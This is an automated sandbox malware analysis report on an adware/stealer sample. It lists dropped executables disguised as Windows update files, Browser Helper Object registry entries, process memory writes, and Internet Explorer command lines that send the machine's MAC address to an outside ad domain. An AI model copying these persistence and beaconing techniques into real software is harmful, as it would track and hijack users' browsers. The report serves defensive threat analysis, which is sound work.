Malware Analysis Report

2025-01-18 21:27

Sample ID 240321-vvh35seg5z
Target dc2f1aa97d98d83b66f0d5253bb41165
SHA256 ebf662eb519aa12b8a23b9088490eaf8a45101314faf5496898f2c327e705e72
Tags
adware stealer
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

ebf662eb519aa12b8a23b9088490eaf8a45101314faf5496898f2c327e705e72

Threat Level: Shows suspicious behavior

The file dc2f1aa97d98d83b66f0d5253bb41165 was found to be: Shows suspicious behavior.

Malicious Activity Summary

adware stealer

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Installs/modifies Browser Helper Object

Drops file in System32 directory

Unsigned PE

Enumerates physical storage devices

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-21 17:18

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-21 17:18

Reported

2024-03-21 17:21

Platform

win7-20240221-en

Max time kernel

137s

Max time network

135s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\WINDOWS\SysWOW64\4875\Winupdate.exe N/A
N/A N/A C:\WINDOWS\SysWOW64\4875\Winspss.exe N/A

Installs/modifies Browser Helper Object

stealer adware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{FF71FF86-04AC-4cb2-A35A-1262BF791A01} C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\WINDOWS\SysWOW64\4875\Winspss.exe C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A
File created C:\WINDOWS\SysWOW64\4875\PowerHacker_Charm.dll C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A
File created C:\WINDOWS\SysWOW64\4875\PowerHacker.ini C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A
File created C:\Windows\SysWOW64\psjm.dll C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A
File created C:\WINDOWS\SysWOW64\4875\Winupdate.exe C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20053ad6b37bda01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "417203387" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{0D79C1B1-E7A7-11EE-9F01-52C7B7C5B073} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b00000000020000000000106600000001000020000000aaa1be96b39d0589025b1160a609f92dcb0b07fb6df2e3671ec8f8af8dc692db000000000e8000000002000020000000bbfe01b4d671b2217254970be7e9cf62cf85a6c031748092187e3808bf77f93b90000000d2f359b6418489602ccd499098e2cf8bb6c41515058082559b9f81d5bb082abab336101f2931db0dc471b00ddf92f121feba612e40d31bbf1a18e4eb4331a2e076b65b0de8f7efd7ff492d24234e479add1a471a56e0cd6b15bc26e92af82759cf67c3dd54eb9c4fcb3b5f2f9e07797138e8ff4a781f3cbd76f9feaf409fca00cc3eba98b36314da5d74a86e308e34604000000023a2835a1fd42646ba0b67747914d7ac54a7e7302d11dac1fb6d394628ce17e146f3b10ec53bc2e161b5a3c002d203289ce1c8296cf62c4bb531a87bd8c932ff C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b00000000020000000000106600000001000020000000566a0e7b8e772887c04882c47cfc98463016a73d7514a879cf1a4e8f4180018a000000000e80000000020000200000000a42c1dba94c9050217f18ea7c062d2c49f7beff334b5297f597de48d0e8a7c0200000004aae2468b2ff3bc05fc3845f5c83445b8b5b940bf4970576691d69c0f6e857494000000093d57fab261d7901d49d30a91b38ef36a88741750a959deeb9dc23d3030bddbd288639409cf7d004c6f2a8a7d4ffb21494ae151fe4c4efb4e683bc43b6b05f81 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CLSID\ = "{FF71FF86-04AC-4cb2-A35A-1262BF791A01}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\VersionIndependentProgID\ = "new.myb" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\ = "{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1\ = "nop1 Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\0\win32\ = "C:\\Windows\\SysWOW64\\psjm.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ = "Imyob" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\TypeLib\ = "{5399FC70-D920-4d82-8FDE-CC3AD2DE6B76}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\HELPDIR\ = "C:\\Windows\\SysWOW64" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\ProgID\ = "new.myb.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\ = "{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\ = "s 1.0 Type Library" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\FLAGS C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\0\win32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\HELPDIR C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\ = "noep Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CurVer\ = "new.myb.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\ = "nop1 Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ = "Imyob" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\InprocServer32\ = "C:\\Windows\\SysWOW64\\psjm.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\FLAGS\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1\CLSID\ = "{FF71FF86-04AC-4cb2-A35A-1262BF791A01}" C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2768 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2768 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2768 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2768 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2968 wrote to memory of 2064 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2968 wrote to memory of 2064 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2968 wrote to memory of 2064 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2968 wrote to memory of 2064 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2768 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2768 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2768 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2768 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2768 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2768 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2768 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2768 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 2768 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 2768 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 2768 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 2768 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 2768 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 2768 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 2768 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winspss.exe
PID 2768 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winspss.exe
PID 2768 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winspss.exe
PID 2768 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winspss.exe
PID 2484 wrote to memory of 1664 N/A C:\WINDOWS\SysWOW64\4875\Winupdate.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2484 wrote to memory of 1664 N/A C:\WINDOWS\SysWOW64\4875\Winupdate.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2484 wrote to memory of 1664 N/A C:\WINDOWS\SysWOW64\4875\Winupdate.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2484 wrote to memory of 1664 N/A C:\WINDOWS\SysWOW64\4875\Winupdate.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2968 wrote to memory of 840 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2968 wrote to memory of 840 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2968 wrote to memory of 840 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2968 wrote to memory of 840 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe

"C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://up1.adlay.net/App/Pro/rialtom_cnt.php?mac=52-c7-b7-c5-b0-73&key=kmj&pid=rain

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2968 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe /s psjm.dll

C:\WINDOWS\SysWOW64\4875\Winupdate.exe

Winupdate.exe

C:\WINDOWS\SysWOW64\4875\Winspss.exe

Winspss.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://up1.adlay.net/App/Pro/rialtom_pro.php?mac=52-c7-b7-c5-b0-73&key=kmj

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2968 CREDAT:603142 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 up1.adlay.net udp
US 8.8.8.8:53 up1.adlay.net udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Windows\SysWOW64\psjm.dll

MD5 8cea2d23c693ea6fa8e41ea6d9cc3432
SHA1 e965e000871a0b8e6b206256ddcf7657b13cc931
SHA256 7f486807cae14b4913ed33d7e3fe468d7fb97a4e8ae7b7e281a8226d6f5047a1
SHA512 63ff64ca8736b23f6b23466ddd35efb26dd0fdf1675926ef2c74e608384748b7f445c8711105b52dbfc859bdf67fe0e790f5d0365e0b6bcbb1ed90600b45ae99

\Windows\SysWOW64\4875\Winupdate.exe

MD5 addc0dd99f694a8df3caac3fa7c3fda3
SHA1 44d3310c26fba0bab0c679966ca7e26f7333dbc7
SHA256 54203137d5f8dab7b9d47af23d46afd7f8f7a20205d734f30c622167f4a9ac8f
SHA512 8fba70f876e5dd420532335d960dcb9c1af2d056c771410b778b43ca7db898d70f406ef8f1866f8308e95bb63f9cbd4b4f4ebd2a89fa93dd9bb79948f0bd5451

C:\Users\Admin\AppData\Local\Temp\CabC949.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
